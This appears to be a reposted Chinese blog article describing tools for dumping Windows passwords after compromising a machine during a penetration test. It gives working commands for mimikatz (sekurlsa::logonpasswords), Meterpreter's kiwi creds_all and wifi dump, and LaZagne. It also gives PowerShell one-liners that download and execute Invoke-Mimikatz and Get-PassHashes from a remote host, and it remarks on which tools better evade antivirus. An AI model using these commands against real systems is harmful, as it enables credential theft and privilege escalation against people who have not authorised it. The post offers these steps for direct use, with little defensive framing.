本文为大家介绍在渗透测试后期,抓取Windows系统密码常用的几款工具。喜欢就收藏本文吧!
当我们利用msf
或者其他漏洞成功获得系统会话后,接下来我们可以各种密码抓取工具来获取系统的管理员密码。从而进一步提升自身权限。
关于Windows认证
Windows的认证包括三个部分:
-
本地认证
:用户直接操作计算机登录账户。(如:大表哥输入密码登录了自己的电脑。) -
网络认证
:远程连接到工作组中的某个设备(如:远程登录某台服务器) -
域认证
:登陆到域环境中的某个设备
也就是说,当用户输入密码,系统收到密码后将用户输入的密码计算成NTLM Hash
与sam
数据(%SystemRoot%system32configsam
)中该用户的哈希比对 匹配则登录成功,不匹配则登录失败。
密码恢复神器 mimikatz
mimikatz
是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe
进程里获取windows
处于active
状态账号的明文密码。(即直接从系统进程中获取密码,无需破解。高版本系统目前可能不成功。)
项目地址:https://github.com/gentilkiwi/mimikatz/releases/latest
用管理员权限运行mimikatz.exe
,然后输入下面命令
privilege::debug
sekurlsa::logonpasswords
当然我们可以利用msf建立连接后也可以使用mimikatz
输入load mimikatz
然后输入wdigest
就可以获取明文密码
kiwi
为了解决mimikatz
高版本不成功的问题,在msf
框架中引入了kiwi
这款神器。相比之下kiwi的功能更加全面。不仅能加载系统的密码,还可以抓取WiFi的密码。如获取系统密码
creds_all
wifi密码
Powershell配合脚本
上述两款工具,虽说很强大。但是当系统中有杀毒软件时,就显得心有余而力不足。我们可以通过Powershell
命令只需脚本的方式来实现。
🎃Powershell远程加载mimikatz脚本
powershell IEX (New-Object Net.WebClient).DownloadString('http://ip:prot/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds
🍭Powershell加载Get-PassHashes脚本
powershell IEX(new-object net.webclient).downloadstring('http://47.x.x.85/Get-PassHashes.ps1');Get-PassHashes
LaZagne
LaZagne
是基于python环境的windows密码恢复工具。同时支持获取浏览器中保存的密码、maven
svn
wifi
等密码信息。
项目地址:https://github.com/AlessandroZ/LaZagne
🎉安装
pip install -r requirements.txt
或者,我们可以直接下载编译好的exe文件。
获取系统所有密码
laZagne.exe all
在实际测试中发现,laZagne
的免杀效果要比前者略好。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):浅谈Windows下哪些密码恢复工具
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151686.html